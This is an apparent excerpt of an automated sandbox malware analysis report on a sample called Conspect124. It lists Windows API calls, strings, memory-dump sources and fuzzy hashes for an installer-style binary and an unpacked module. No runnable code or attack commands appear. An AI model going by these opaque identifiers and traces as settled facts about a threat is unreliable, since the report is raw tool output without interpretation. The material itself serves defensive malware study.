                                      • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
                                      • wsprintfA.USER32 ref: 00405F17
                                      • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,?,00427588,?,?,?,?,?), ref: 00405F52
                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                      • GlobalFree.KERNEL32(00000000), ref: 00406000
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                      • String ID: %ls=%ls$[Rename]
                                      • API String ID: 2171350718-461813615
                                      • Opcode ID: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                      • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                      • Opcode Fuzzy Hash: 8dac95613b83430ab3c692d209f2e04147d8a9d69613e8c3f61ea45ae8b92b2a
                                      • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 23BC7D06
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90D7
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90E9
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC90FB
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC910D
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC911F
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9131
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9143
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9155
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9167
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC9179
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC918B
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC919D
                                        • Part of subcall function 23BC90BA: _free.LIBCMT ref: 23BC91AF
                                      • _free.LIBCMT ref: 23BC7CFB
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC7D1D
                                      • _free.LIBCMT ref: 23BC7D32
                                      • _free.LIBCMT ref: 23BC7D3D
                                      • _free.LIBCMT ref: 23BC7D5F
                                      • _free.LIBCMT ref: 23BC7D72
                                      • _free.LIBCMT ref: 23BC7D80
                                      • _free.LIBCMT ref: 23BC7D8B
                                      • _free.LIBCMT ref: 23BC7DC3
                                      • _free.LIBCMT ref: 23BC7DCA
                                      • _free.LIBCMT ref: 23BC7DE7
                                      • _free.LIBCMT ref: 23BC7DFF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: ed6bf201cf9895fb536eaefd1a73b9469d35e6ff16132d511c0b16c358f4b448
                                      • Instruction ID: eda14e95d68c3ad8bf9014e07a99ebbc27ec0dc967331475fc51c4dd3dfd151d
                                      • Opcode Fuzzy Hash: ed6bf201cf9895fb536eaefd1a73b9469d35e6ff16132d511c0b16c358f4b448
                                      • Instruction Fuzzy Hash: DD314E71600385DFEB31EF39D942B6677E9EF04250F144CBAE859D7561DE31A980CB14
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ED2
                                      • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                        • Part of subcall function 00405D3E: GetFileAttributesW.KERNEL32(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                        • Part of subcall function 00405D3E: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                      Strings
                                      • soft, xrefs: 00402FAF
                                      • Inst, xrefs: 00402FA6
                                      • Null, xrefs: 00402FB8
                                      • Error launching installer, xrefs: 00402F11
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 4283519449-527102705
                                      • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                      • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                      • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(004281A0,00000400), ref: 004063AF
                                      • GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063C2
                                      • SHGetSpecialFolderLocation.SHELL32(004052E7,?,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 004063FE
                                      • SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 0040640C
                                      • CoTaskMemFree.OLE32(?), ref: 00406417
                                      • lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                      • lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,004052E7,004226C8,00000000), ref: 00406495
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040637F
                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406437
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 717251189-730719616
                                      • Opcode ID: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                      • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                      • Opcode Fuzzy Hash: 660a257a7b103c90d39de6636f579df070273bd2f08f72e50a14a68ce918bb0d
                                      • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                      APIs
                                      • _free.LIBCMT ref: 23BC59EA
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC59F6
                                      • _free.LIBCMT ref: 23BC5A01
                                      • _free.LIBCMT ref: 23BC5A0C
                                      • _free.LIBCMT ref: 23BC5A17
                                      • _free.LIBCMT ref: 23BC5A22
                                      • _free.LIBCMT ref: 23BC5A2D
                                      • _free.LIBCMT ref: 23BC5A38
                                      • _free.LIBCMT ref: 23BC5A43
                                      • _free.LIBCMT ref: 23BC5A51
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 4009ba82e59241df63a29089109a0f2fa02bc5fbb651ec65722f58b991a1b519
                                      • Instruction ID: 05e88edfec09a62c0b5f9466c9d896e40563ed8377c563d1469f7a851dbd6353
                                      • Opcode Fuzzy Hash: 4009ba82e59241df63a29089109a0f2fa02bc5fbb651ec65722f58b991a1b519
                                      • Instruction Fuzzy Hash: 9711747A520288EFCB31DF96C841CDE3FA5EF18250B5545E6BA088B225DA31DA909B80
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: a16d57258cdc5fdcaf5c95ccefda7138db4029939f961b5e7924b5351c64c53d
                                      • Instruction ID: f450dc2fb7eeb44dda150da0e825b65955ceb1624ad4372296e4185c7d91ecce
                                      • Opcode Fuzzy Hash: a16d57258cdc5fdcaf5c95ccefda7138db4029939f961b5e7924b5351c64c53d
                                      • Instruction Fuzzy Hash: 12516171A0058ECFDB20EFA8DA845DDBFB5FF4A210F144AE5E581A7664C7358E24CB18
                                      APIs
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D1B
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23BC1D37
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D4B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D58
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D72
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D7D
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC1D8A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 1454806937-0
                                      • Opcode ID: 7d9b96788db868f0b0d2ab15c96888478b7e7b0a3ed5e6bffb90788c8ad7e1a1
                                      • Instruction ID: 629be125336d95a757693e3268736ecd53b93a0525340d7083d74e876e9f12a6
                                      • Opcode Fuzzy Hash: 7d9b96788db868f0b0d2ab15c96888478b7e7b0a3ed5e6bffb90788c8ad7e1a1
                                      • Instruction Fuzzy Hash: 0D213DB590125CAFDB31EFA48D9CEEA76ACEF2C245F040DAAF511E3140D6749E468A70
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                      • GetSysColor.USER32(00000000), ref: 00404281
                                      • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                      • SetBkMode.GDI32(?,?), ref: 00404299
                                      • GetSysColor.USER32(?), ref: 004042AC
                                      • SetBkColor.GDI32(?,?), ref: 004042BC
                                      • DeleteObject.GDI32(?), ref: 004042D6
                                      • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                      • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                      • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                      APIs
                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                        • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E35
                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                      • String ID: 9
                                      • API String ID: 163830602-2366072709
                                      • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                      • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                      • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23BC9C07,?,00000000,?,00000000,00000000), ref: 23BC94D4
                                      • __fassign.LIBCMT ref: 23BC954F
                                      • __fassign.LIBCMT ref: 23BC956A
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 23BC9590
                                      • WriteFile.KERNEL32(?,?,00000000,23BC9C07,00000000,?,?,?,?,?,?,?,?,?,23BC9C07,?), ref: 23BC95AF
                                      • WriteFile.KERNEL32(?,?,?,23BC9C07,00000000,?,?,?,?,?,?,?,?,?,23BC9C07,?), ref: 23BC95E8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 92d36dd3de60024856d6a8859ebb1327a382a6e62018bfc746550a51e241df73
                                      • Instruction ID: 4bf0afa44c7b8f85cfdd9fb9c6a5d25950537fb81eaa0cc9a43d821bf7ec38df
                                      • Opcode Fuzzy Hash: 92d36dd3de60024856d6a8859ebb1327a382a6e62018bfc746550a51e241df73
                                      • Instruction Fuzzy Hash: 3B51A271E00289AFDB20CFA8C895BDEBBF8FF1D300F14496AE955E7291D6709941CB60
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC339B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 23BC33A3
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC3431
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 23BC345C
                                      • _ValidateLocalCookies.LIBCMT ref: 23BC34B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: a7addf6e4945e00755ce0c900321a83a054b17c355041da19cf069e095bf48e7
                                      • Instruction ID: ced2ffde00a418ea7882c48ad46c185a2ac623ac3d027cd48923a2457c9fdbcb
                                      • Opcode Fuzzy Hash: a7addf6e4945e00755ce0c900321a83a054b17c355041da19cf069e095bf48e7
                                      • Instruction Fuzzy Hash: C741DB34A002889FCB31DF68C844ADEBBB5EF85224F9485F5D91C9B261D739DA01CF95
                                      APIs
                                      • lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                      • lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                      • lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                      • SetWindowTextW.USER32(004226C8,004226C8), ref: 0040531D
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                      • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                      • Opcode Fuzzy Hash: c450a6db2bcd4e69ba1345c50ea13f3d64df8f874693148a8668e21b4e00a482
                                      • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                      APIs
                                        • Part of subcall function 23BC9221: _free.LIBCMT ref: 23BC924A
                                      • _free.LIBCMT ref: 23BC92AB
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC92B6
                                      • _free.LIBCMT ref: 23BC92C1
                                      • _free.LIBCMT ref: 23BC9315
                                      • _free.LIBCMT ref: 23BC9320
                                      • _free.LIBCMT ref: 23BC932B
                                      • _free.LIBCMT ref: 23BC9336
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction ID: 6717d52c4715be4f8ab6b1d7a0af380ffa2959a6d10e502681ad331b03eb181d
                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction Fuzzy Hash: 4A117F31940B88EEE670EFB0DC45FCB7BADAF1C711F400C76A6DD7A092DA24B6448651
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                      • GetMessagePos.USER32 ref: 00404B9D
                                      • ScreenToClient.USER32(?,?), ref: 00404BB7
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                      • Instruction Fuzzy Hash: CD015E71900218BADB00DB94DD85FFFBBBCAF95711F10412BBA51B61D0D7B4A9018BA4
                                      APIs
                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402E20
                                      • wsprintfW.USER32 ref: 00402E30
                                      • SetWindowTextW.USER32(?,?), ref: 00402E40
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402E2A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmp
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmp
